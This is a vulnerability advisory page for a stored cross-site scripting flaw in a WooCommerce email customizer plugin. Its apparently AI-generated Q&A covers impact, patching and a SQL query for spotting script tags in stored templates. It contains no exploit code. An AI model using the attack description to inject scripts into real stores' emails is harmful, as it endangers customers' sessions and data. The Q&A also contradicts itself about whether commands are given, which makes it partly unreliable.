CVE-2025-13974
Stored XSS in Email Customizer for WooCommerce Plugin
Publication date: 2026-01-07
Last updated on: 2026-04-08
Assigner: Wordfence
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| themehigh | email_customizer_for_woocommerce | to 2.6.7 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
An attacker with administrator access can inject malicious scripts into email templates, which will run when customers view transactional emails. This can lead to unauthorized actions performed in the context of the customer's browser, potentially compromising customer data or session information. The impact includes limited confidentiality and integrity loss but no availability impact.
Can you explain this vulnerability to me?
This vulnerability is a Stored Cross-Site Scripting (XSS) issue in the Email Customizer for WooCommerce plugin for WordPress, affecting versions up to 2.6.7. It occurs because the plugin does not properly sanitize or escape input in email template content. Authenticated users with administrator-level access can inject malicious scripts into email templates. These scripts execute when customers view transactional emails. The vulnerability only affects multi-site installations or those where unfiltered_html is disabled.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, immediately update the Email Customizer for WooCommerce plugin to a version later than 2.6.7 where the issue is fixed. Additionally, ensure that only trusted administrators have access to the plugin settings, especially in multi-site installations or where unfiltered_html is disabled. Review and sanitize email template content to prevent injection of malicious scripts.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by identifying if the Email Customizer for WooCommerce plugin version 2.6.7 or earlier is installed on a WordPress multi-site setup where unfiltered_html is disabled, and if administrator-level users have the ability to edit email templates. Since the vulnerability involves stored cross-site scripting in email templates, detection involves checking for suspicious or unexpected script tags or JavaScript code within the email template content stored in the database or plugin files. There are no specific network commands provided in the resources. However, you can manually inspect the email templates via the WordPress admin interface or by querying the database for email template content containing script tags. For example, to search the WordPress database for suspicious script tags in email templates, you might run a SQL query like: SELECT * FROM wp_options WHERE option_name LIKE '%email_customizer%' AND option_value LIKE '%<script%'; or search plugin template files for injected scripts. Additionally, monitoring outgoing emails for embedded scripts could help detect exploitation. No explicit commands are provided in the resources. [1, 3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.